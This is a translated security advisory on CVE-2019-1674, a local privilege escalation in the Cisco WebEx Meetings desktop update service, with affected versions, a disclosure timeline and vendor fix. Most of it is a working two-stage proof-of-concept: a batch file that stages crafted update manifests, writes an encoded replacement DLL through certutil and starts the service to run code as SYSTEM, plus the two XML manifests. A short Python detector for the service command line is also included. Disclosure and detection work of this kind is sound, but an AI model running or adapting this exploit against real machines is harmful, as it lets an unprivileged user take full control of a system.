Analysis of the Cisco WebEx Meetings Local Privilege Escalation Vulnerability (CVE-2019-1674)

41yf1sh  Vulnerabilities  Published March 7, 2019

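Summary: The update service of the Cisco WebEx Meetings desktop app contains a vulnerability that allows a local attacker to elevate privileges on the Windows version of the application.

Overview

Cisco's WebEx Meetings is a video conferencing and online meeting platform that supports clear audio and video communication and easy screen sharing. According to the vendor's own description, the platform "helps you forget about the technology, to focus on what matters". The update service of the Cisco WebEx Meetings desktop app contains a vulnerability that allows a local attacker to elevate privileges on the Windows version of the application.

Affected versions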

· Cisco Webex Meetings Desktop App v33.6.4.15

· Cisco Webex Meetings Desktop App v33.6.5.2

· Cisco Webex Meetings Desktop App v33.7.0.694

· Cisco Webex Meetings Desktop App v33.7.1.15

· Cisco Webex Meetings Desktop App v33.7.2.24

· Cisco Webex Meetings Desktop App v33.7.3.7

· Cisco Webex Meetings Desktop App v33.8.0.779

· Cisco Webex Meetings Desktop App v33.8.1.13

· Cisco Webex Meetings Desktop App v33.8.2.7

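Older versions are probably affected as well, but they have not been checked.

Vulnerability details

The update service of the Cisco Webex Meetings Desktop App for Windows does not properly validate the version numbers of new files. An unprivileged local attacker can exploit this by invoking the update service command with crafted arguments and a crafted folder. This allows the attacker to run arbitrary commands with SYSTEM user privileges.

To exploit the vulnerability, the attacker must first copy the atgpcdec.dll binary to a local attacker-controlled folder and rename it to atgpcdec.7z. Next, a previous version of the ptUpdate.exe file must be compressed as a 7z file and copied to the controlled folder. A malicious DLL must also be placed in the same folder, named vcruntime140.dll and compressed as vcruntime140.7z. Finally, a ptUpdate.xml file must be provided in the controlled folder for the update binary (ptUpdate.exe), so that the application treats the files as a normal update.

To gain privileges, the attacker must start the service from the command line: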

sc start webexservice WebexService 1 989898 "attacker-controlled-path"
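
For detection, the service start shown above is visible in process-creation telemetry (for example Sysmon Event ID 1 or Security event 4688 command lines). The following added example, which is not part of the original advisory, flags command lines that start webexservice with a folder argument outside the install directory; the trusted roots and the sample command lines are assumptions constructed for illustration.

```python
import ntpath
import shlex

# Assumption: install roots as used by the paths in the page's batch file.
# Folders below them are treated as not writable by unprivileged users.
TRUSTED_ROOTS = (
    r"c:\program files (x86)\webex",
    r"c:\program files\webex",
)

def update_folder(cmdline):
    """Return the folder passed to 'sc start webexservice ...', or None."""
    try:
        tokens = [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    except ValueError:  # unbalanced quotes
        return None
    lowered = [t.lower() for t in tokens]
    if len(tokens) < 3 or ntpath.basename(lowered[0]) not in ("sc", "sc.exe"):
        return None
    if lowered[1] != "start" or lowered[2] != "webexservice":
        return None
    # Page's invocation: WebexService 1 989898 <folder>. An unquoted folder
    # containing spaces is split into several tokens, so re-join the tail.
    folder = " ".join(tokens[6:])
    return folder or None

def is_suspicious(cmdline):
    """True when the update folder is outside every trusted install root."""
    folder = update_folder(cmdline)
    if not folder:
        return False
    norm = ntpath.normpath(folder).lower()  # also collapses '..' segments
    return not any(norm == r or norm.startswith(r + "\\") for r in TRUSTED_ROOTS)

SAMPLE_EVENTS = [  # constructed process-creation command lines
    r'sc start webexservice WebexService 1 989898 "C:\Users\bob\AppData\Local\Temp\upd"',
    r'C:\Windows\System32\sc.exe START WebExService WebexService 1 989898 C:\Users\Public\my folder',
    r'sc start webexservice',
    r'sc.exe start webexservice WebexService 1 989898 "C:\Program Files (x86)\Webex\Webex\Applications"',
    r'sc query webexservice',
]

def flag(events):
    """Return the command lines that deserve review."""
    return [e for e in events if is_suspicious(e)]
```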

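Proof of concept

The proof of concept below performs a two-step attack, because starting with version 33.8.x the application enforces a signature check on all downloaded binaries. The two-step attack works against all of the vulnerable packages listed above. Note that the proof of concept also requires previous versions of the ptUpdate.exe executable: version 3307.1.1811.1500 for the first step and version 3306.4.1811.1600 for the second. If the target version is lower than 33.8.x, only the second step is actually needed.

The batch file is as follows: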

/-----
 @echo off
 REM Contents of PoC.bat
 REM
 REM This batch file will exploit CVE-2019-1674
 REM
 REM First, it will copy the atgpcdec.dll file from the installation
 REM folder to the current folder as atgpcdec.7z. Then, it will backup
 REM ptUpdate.exe and vcruntime140.dll files from the installation folder
 REM in the current folder, adding .bak to their names. Keep in mind that
 REM those files will be replaced (especially, vcruntime140.dll) and if
 REM not restored, will render the application useless.
 REM
 REM The executable ptUpdate.exe version 3307.1.1811.1500 must be
 REM compressed as ptUpdate0.7z and present in the current folder.
 REM The executable ptUpdate.exe version 3306.4.1811.1600 must be
 REM compressed as ptUpdate1.7z and present in the current folder.
 REM Both can be generated using 7zip GUI and compressing as 7z, with
 REM normal compression level and LZMA compression method.
 REM Another way is to compress both files using the command line app:
 REM
 REM 7z.exe a ptUpdate0.7z ptUpdate.exe -m0=BCJ -m1=LZMA:d=21
 REM
 REM ptUpdate0.xml file will be used in the first stage of the attack. It
 REM will be renamed to ptUpdate.xml. Make sure to check and adjust (if
 REM necessary) the "Size" and "PackagedSize" values of the xml, to the
 REM ptUpdate0.7z ones. ptUpdate0.7z will be renamed to ptUpdate.7z. Then
 REM the update service will be started.
 REM
 REM The batch will wait until the process (ptUpdate.exe) finishes
 REM
 REM After the first stage is completed, it will rename ptUpdate.7z
 REM back to ptUpdate0.7z, and ptUpdate.xml to ptUpdate0.xml.
 REM
 REM Now, ptUpdate1.xml file will be used in the second stage of the
 REM attack. It will be renamed to ptUpdate.xml. Also, ptUpdate1.7z will
 REM be renamed to ptUpdate.7z. Remember to check and adjust (if
 REM necessary) the "Size" and "PackagedSize" values of the xml, to the
 REM ptUpdate1.7z ones. Our "malicious" DLL will be generated using
 REM certutil.exe and named vcruntime140.7z. It's a simple dll that will
 REM execute notepad.exe on load and that has the same exported functions
 REM as the original. The update service will be started again.
 REM
 REM The batch will wait until the process (ptUpdate.exe) finishes
 REM
 REM Once finished, it will print that the attack is done and wait for a
 REM key press. You should see a notepad.exe (2, in fact) with SYSTEM
 REM user privileges running.
 REM
 REM After a key is pressed, the batch will finish removing atgpcdec.7z
 REM and vcruntime140.7z. Also it will rename ptUpdate.7z back to
 REM ptUpdate1.7z, and ptUpdate.xml to ptUpdate1.xml.
 
 
 :CheckOS
 IF EXIST "%PROGRAMFILES(X86)%" (GOTO 64BIT) ELSE (GOTO 32BIT)
 
 :64BIT
 copy "%PROGRAMFILES(X86)%\Webex\Webex\Applications\atgpcdec.dll" atgpcdec.7z
 copy "%PROGRAMFILES(X86)%\Webex\Webex\Applications\ptUpdate.exe" ptUpdate.exe.bak
 copy "%PROGRAMFILES(X86)%\Webex\Webex\Applications\vcruntime140.dll" vcruntime140.dll.bak
 GOTO END
 
 :32BIT
 copy "%PROGRAMFILES%\Webex\Webex\Applications\atgpcdec.dll" atgpcdec.7z
 copy "%PROGRAMFILES%\Webex\Webex\Applications\ptUpdate.exe" ptUpdate.exe.bak
 copy "%PROGRAMFILES%\Webex\Webex\Applications\vcruntime140.dll" vcruntime140.dll.bak
 GOTO END
 
 :END
 
 ren ptUpdate0.xml ptUpdate.xml
 ren ptUpdate0.7z ptUpdate.7z
 SET mypath=%~dp0
 sc start webexservice WebexService 1 989898 %mypath:~0,-1%
 
 ECHO Waiting 3 seconds until ptUpdate.exe starts
 Timeout /T 3 /Nobreak
 
 :LOOP1
 tasklist | find /i "ptUpdate" >nul 2>&1
 IF ERRORLEVEL 1 (
   GOTO CONTINUE1
 ) ELSE (
   ECHO ptUpdate.exe is still running
   Timeout /T 1 /Nobreak
   GOTO LOOP1
 )
 
 :CONTINUE1
 
 ren ptUpdate.xml ptUpdate0.xml
 ren ptUpdate.7z ptUpdate0.7z
 ren ptUpdate1.xml ptUpdate.xml
 ren ptUpdate1.7z ptUpdate.7z
 
 echo
 N3q8ryccAARIz/fVRwYAAAAAAAB6AAAAAAAAANcfWYEAJpaOcAAX9+wFu+r0/5QBL0TuTr0Jkm3dgTnz3Weoe6NfFfEa/Y28zsBB2HEdPWzlugty+IIM4hglhy/h80OeyYw5CMe7jUK77wLPQMC9wwpT+oLYVDSuOK/v2WNuOLCpU3qtGSO+2sIFpGixpKQvLykpGOZUMczuRNNr/8Ps1lApsqe0ERm7gPGyiMqJBOCOVTC85lKIa2Cmc
 > dll.txt
 echo
 scrjgqKPPNmbXvscJWxmvv4NtC3mLQ1KuXYBSZXmFp8dR+ZDy5znkGG/C3w0T76c4wRCfOk+/myji9luDzO2OOwp8wgpN1QeGsA4+kaZwKYTisIvPegsI2joDsLAomIh2ToXENtcOA9/11kkJy4ColEdqlXxwSW2u45ajuNDs0aAE9nbz4AWXtv/VPfc4fn3Q+mN7FTmaDUr8dxZ5V05IafOO2qTgdSHPemTasMSqYLbzA8iaxBZimokw
 >> dll.txt
 echo
 zyzr3fwZIci+Ewzq5BnNXk+lvA30xCUYdvQuMCGkxBozk9Ec0kQ/SUixz77Nc9SbJnm0Hncff3QRRlU9ciqc6cYkQ2Cm+/dWkyDgJU+sxT9VGV+WVwNK85Q6zpPWLeVRYtk9UkxKHF0aXf3l/OgfQqtz0WSR94AF+Z9AiblDy0zOreSW8PhFbu0hfAgY1pMNC5gPNJiJ3OGwT/cLEhBPusvpfcLP3V0BwXx04T+5R7d5Rw9xWExdfCzGb
 >> dll.txt
 echo
 Mgyijdf5nP7fv9e5V0KO8kKrGVofstVIN8FTQSMeRGYRdv9WyuLRFWbArCL86HMo5NYEwFinlqCGqnY8hZcDMPe89q1xoNlVDmDtLC+AZqEkPKuqStllzKH7qQDg7Ahe6AMtGjaT2NptL2bSBYlkfn+1iiMt5cC/inZAoZoreSpDbGb4HRcOVce7ZKeiBAFpEzM0bEXAxnbLNO0pHm0bYCftbOkffJap3m79V+Dj4t0NPgwbhYKUqk1Hi
 >> dll.txt
 echo
 /9ebVE+IIsUlFFggilCy7BmIh3MF3Gmuhr7QLK37zV72LA0/tuDXXTWP/0EJEQ3F/v1+hSj/+HMwUBFL8xsghBfOXTpmBG6cUxK2YOwXvs/ntja2a7SWwppxtWgr4n/pxEdeezoBGl1sTZ9aIwSlu1mMehS5RYoyiSKnQfgLMsIYLqjZtc2DjUdSZDutZgC91axMjIEQ8kDIBp8dbuX4MpzNYe65OrKG/u76aemvcQ/R1QAwgTopuWgqO
 >> dll.txt
 echo
 tJ7LIkRv406u+Qs2d5KA9+IplFV7ZL9w1zXTDTFqATROK0IKtY2MPaP5Ia0d0UFizj0I7OZSeDtZXPohMxi01xMLyqCXIQ4vaJGVneNi1SyxAJ2hV92+5sxBCOlQ+d4w19k6iJA/siz1+V0FnIrN6csCMaW6yBnR6H+jHpm2sqXf3xyU8UkCRx09LmD1lcSB3sWdc3AnoG2ijb7lD6eBdCH2OlMWceeAfOMRm48MfYW6+AcZJm9wEQ9p8
 >> dll.txt
 echo
 irxwCQuETvGMphqzbPxFJXErhoMTxlE57+/ZLBt8F/3XAaxQnmMucvSCFMYc6Z76OCbeotPfVnPhqL+torsEaph6DFzcw3dWuFrekbLnVVFKmM/QyeZVLS18u5lY1tGRyfAUCyhPIPJvUcXFKuDYHmdT/bOnF1B/xexvtY8boRhcKiNg4JBluTMbamdoktvfWvIVGUz2m50yA0dNN06yebHietxA+IwM0zfNbqpNWJjOItsi6/27j1mE7
 >> dll.txt
 echo
 WCgPS5tetN44WkYD28Bm+LmHwz4lbPVjAIcgZBv0OtAXJsWMUtN8Bc2z9+fVSqc7pCHGCRnYDyKm8QhcV8hU4I/M4hSN+BWYn2jGJqc42lcaMzfXrySCnF4dAtIiE1HzAwmwWAqjlVkZdFiIuQ1m+pdbx2Ipji5piYRAJtykwO0H5JThzAzJGObOMCAenaKgvgtwF97iFdBZHxuSz+3DcYF6gQupm/BxNd35l6qj19sN2qixeGJ7rQapV
 >> dll.txt
 echo
 DJLTM5KMPdSItBNJSLLp9fuObcufi/6MBif28vemivzaWtalocJxX/MJni8PfdLYn/rLJQXmpq4Qm7z6N7FlPLtelATkMAZZ2ofaLFeBvIKzymBqtsxQAb63b+MowQvOkGAesT5JNXhoRqzOoATB9I/O7xIZu30SZwWdW85DX2MNAeB/DgzLt/c7U9A2D5vIgAEEBgABCYZHAAcLAQACIwMBAQVdABgAAAQDAwEDAQAMmACYAAAICgGcR
 >> dll.txt
 echo
 dWGAAAFARkLAAAAAAAAAAAAAAARIwB2AGMAcgB1AG4AdABpAG0AZQAxADQAMAAuAGQAbABsAAAAGQAUCgEAkBJyInaL1AEVBgEAIAAAAAAA
 >> dll.txt
 
 certutil -decode dll.txt vcruntime140.7z
 
 del dll.txt
 
 SET mypath=%~dp0
 sc start webexservice WebexService 1 989898 %mypath:~0,-1%
 
 ECHO Waiting 3 seconds until ptUpdate.exe starts
 Timeout /T 3 /Nobreak
 
 :LOOP2
 tasklist | find /i "ptUpdate" >nul 2>&1
 IF ERRORLEVEL 1 (
   GOTO CONTINUE2
 ) ELSE (
   ECHO ptUpdate.exe is still running
   Timeout /T 1 /Nobreak
   GOTO LOOP2
 )
 
 :CONTINUE2
 
 ECHO Attack done!
 pause
 
 ren ptUpdate.xml ptUpdate1.xml
 ren ptUpdate.7z ptUpdate1.7z
 del atgpcdec.7z
 del vcruntime140.7z
 -----/

The ptUpdate0.xml file is as follows:

/-----
 <?xml version="1.0"?>
 <serv:message xmlns:serv="http://www.webex.com/schemas/2002/06/service"
 xmlns:com="http://www.webex.com/schemas/2002/06/common"
 xmlns:use="http://www.webex.com/schemas/2002/06/service/user">
     <serv:header></serv:header>
     <serv:body>
         <serv:bodyContent xsi:type="use:getUpdateResponse"
 xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
             <UpdateVersionNumber>33.8.3</UpdateVersionNumber>
             <BuildNumber>33.8.3-24</BuildNumber>
             <ExternalVersionNumber>33.8.3.24</ExternalVersionNumber>
             <GPCINI>self/gpc.php</GPCINI>
             <ReleaseDate>February 2017</ReleaseDate>
             <Description>WebEx Productivity Tools 33.8.3</Description>
             <MsiLocation>msi/ptools.msi</MsiLocation>
             <UpdateFormat>binary</UpdateFormat>
             <ReleaseTrain>T32</ReleaseTrain>
             <Location>$dummy/upgradeserver/client/ptool/33.8.3</Location>
             <ControlOption>0</ControlOption>
             <WBSVERSION>33</WBSVERSION>
             <Server>myCompany.webex.com</Server>
             <UserName>[email protected]</UserName>
             <DownloadSize>22496333</DownloadSize>
             <VersionURL/>
             <FileInfo>
                 <SectionName>Installation</SectionName>
                 <PackedName>ptupdate.7z</PackedName>
                 <PackedNameL10N>ptupdate.7z</PackedNameL10N>
                 <OrigianlName>ptupdate.exe</OrigianlName>
                 <Version>3307,1,1811,1500</Version>
                 <Size>1985592</Size>
                 <PackagedSize>610752</PackagedSize>
                 <CheckMethod>1</CheckMethod>
                 <CouldIgnore>1</CouldIgnore>
                 <NeedDownLoad>1</NeedDownLoad>
             </FileInfo>
             <Tools>
                 <UseEmailType/>
                 <Outlook>0</Outlook>
                 <Notes>0</Notes>
                 <UseWebExWithOffice>1</UseWebExWithOffice>
                 <Excel>0</Excel>
                 <PowerPoint>0</PowerPoint>
                 <Word>0</Word>
                 <IEShortCut>1</IEShortCut>
                 <IERightMenu>0</IERightMenu>
                 <UseWebExWithIM>1</UseWebExWithIM>
                 <AOL>0</AOL>
                 <Sametime>0</Sametime>
                 <WindowsMessenger>0</WindowsMessenger>
                 <Yahoo>0</Yahoo>
                 <Skype>0</Skype>
                 <GoogleTalk>0</GoogleTalk>
                 <Firefox/>
                 <IPPhone>1</IPPhone>
             </Tools>
         </serv:bodyContent>
     </serv:body>
 </serv:message>
 -----/

The ptUpdate1.xml file is as follows:

/-----
 <?xml version="1.0"?>
 <serv:message xmlns:serv="http://www.webex.com/schemas/2002/06/service"
 xmlns:com="http://www.webex.com/schemas/2002/06/common"
 xmlns:use="http://www.webex.com/schemas/2002/06/service/user">
     <serv:header>                                                       
     </serv:header>
     <serv:body>
         <serv:bodyContent xsi:type="use:getUpdateResponse"
 xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
             <UpdateVersionNumber>33.8.4</UpdateVersionNumber>
             <BuildNumber>33.8.4-24</BuildNumber>
             <ExternalVersionNumber>33.8.4.24</ExternalVersionNumber>
             <GPCINI>self/gpc.php</GPCINI>
             <ReleaseDate>February 2017</ReleaseDate>
             <Description>WebEx Productivity Tools 33.8.4</Description>
             <MsiLocation>msi/ptools.msi</MsiLocation>
             <UpdateFormat>binary</UpdateFormat>
             <ReleaseTrain>T32</ReleaseTrain>
             <Location>$dummy/upgradeserver/client/ptool/33.8.4</Location>
             <ControlOption>0</ControlOption>
             <WBSVERSION>33</WBSVERSION>
             <Server>myCompany.webex.com</Server>
             <UserName>[email protected]</UserName>
             <DownloadSize>22496333</DownloadSize>
             <VersionURL/>
             <FileInfo>
                 <SectionName>Common</SectionName>
                 <PackedName>vcruntime140.7z</PackedName>
                 <PackedNameL10N>vcruntime140.7z</PackedNameL10N>
                 <OrigianlName>vcruntime140.dll</OrigianlName>
                 <Version>14,14,26405,0</Version>
                 <Size>6144</Size>
                 <PackagedSize>1761</PackagedSize>
                 <CheckMethod>1</CheckMethod>
                 <CouldIgnore>1</CouldIgnore>
                 <NeedDownLoad>1</NeedDownLoad>
             </FileInfo>
             <FileInfo>
                 <SectionName>Installation</SectionName>
                 <PackedName>ptupdate.7z</PackedName>
                 <PackedNameL10N>ptupdate.7z</PackedNameL10N>
                 <OrigianlName>ptupdate.exe</OrigianlName>
                 <Version>3306,4,1811,1600</Version>
                 <Size>1992760</Size>
                 <PackagedSize>611786</PackagedSize>
                 <CheckMethod>1</CheckMethod>
                 <CouldIgnore>1</CouldIgnore>
                 <NeedDownLoad>1</NeedDownLoad>
             </FileInfo>
             <Tools>
                 <UseEmailType/>
                 <Outlook>0</Outlook>
                 <Notes>0</Notes>
                 <UseWebExWithOffice>1</UseWebExWithOffice>
                 <Excel>0</Excel>
                 <PowerPoint>0</PowerPoint>
                 <Word>0</Word>
                 <IEShortCut>1</IEShortCut>
                 <IERightMenu>0</IERightMenu>
                 <UseWebExWithIM>1</UseWebExWithIM>
                 <AOL>0</AOL>
                 <Sametime>0</Sametime>
                 <WindowsMessenger>0</WindowsMessenger>
                 <Yahoo>0</Yahoo>
                 <Skype>0</Skype>
                 <GoogleTalk>0</GoogleTalk>
                 <Firefox/>
                 <IPPhone>1</IPPhone>
             </Tools>
         </serv:bodyContent>
     </serv:body>
 </serv:message>
 -----/

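Timeline

· December 4, 2018: SecureAuth sent a notification to Cisco PSIRT.

· December 5, 2018: Cisco acknowledged receipt of the vulnerability and said it would analyze it.

· December 7, 2018: Cisco replied that it was working out a plan to fix the vulnerability.

· December 7, 2018: SecureAuth thanked Cisco for the status update.

· December 10, 2018: Cisco notified SecureAuth that it expected to release an update before the end of February.

· December 10, 2018: SecureAuth thanked Cisco for the status update.

· January 15, 2019: SecureAuth asked Cisco for an update.

· January 22, 2019: SecureAuth asked Cisco for an update again.

· January 22, 2019: Cisco replied that the fix would be released in February.

· February 11, 2019: Cisco confirmed February 27 as the disclosure date.

· February 27, 2019: This article was published.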

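Vendor response

Cisco stated that the vulnerability has been fixed in versions 33.6.6 and 33.9.1 of the Cisco Webex Meetings Desktop App. In addition, Cisco published the following advisory: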

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-wmda-cmdinj

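Credits

This vulnerability was discovered and researched by Marcos Accossatto of SecureAuth. Publication of this advisory was coordinated by Leandro Cuozzo of the SecureAuth Advisories Team.

This article was translated from: https://packetstormsecurity.com/files/151914 If you repost it, please credit the original address: https://www.4hou.com/vulnerable/16522.html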